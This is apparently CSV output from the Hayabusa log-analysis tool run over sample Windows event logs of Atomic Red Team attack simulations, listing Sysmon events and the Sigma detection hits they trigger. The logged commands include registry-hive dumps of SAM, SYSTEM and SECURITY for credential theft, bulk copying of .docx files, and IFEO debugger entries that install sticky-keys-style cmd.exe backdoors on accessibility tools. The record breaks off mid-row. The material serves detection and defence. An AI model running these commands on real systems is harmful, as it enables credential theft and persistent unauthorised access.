2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 747F3D96-D87D-5D31-0000-0010958F3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and
Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command 
Prompt,,../hayabusa-rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-D890-5D31-0000-001012383200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,../hayabusa-rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 
747F3D96-D890-5D31-0000-0010A5383200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D890-5D31-0000-001085443200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe 
| User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 
747F3D96-D89A-5D31-0000-0010F2703200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 
747F3D96-D89F-5D31-0000-0010BD7F3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 747F3D96-D89F-5D31-0000-0010BC823200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image 
File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2484 | PGUID: 
747F3D96-D8A2-5D31-0000-0010D8943200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 
747F3D96-D8A5-5D31-0000-0010C39D3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 747F3D96-D8A5-5D31-0000-0010C0A03200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image 
File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6664 | PGUID: 
747F3D96-D8A6-5D31-0000-0010F9B13200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 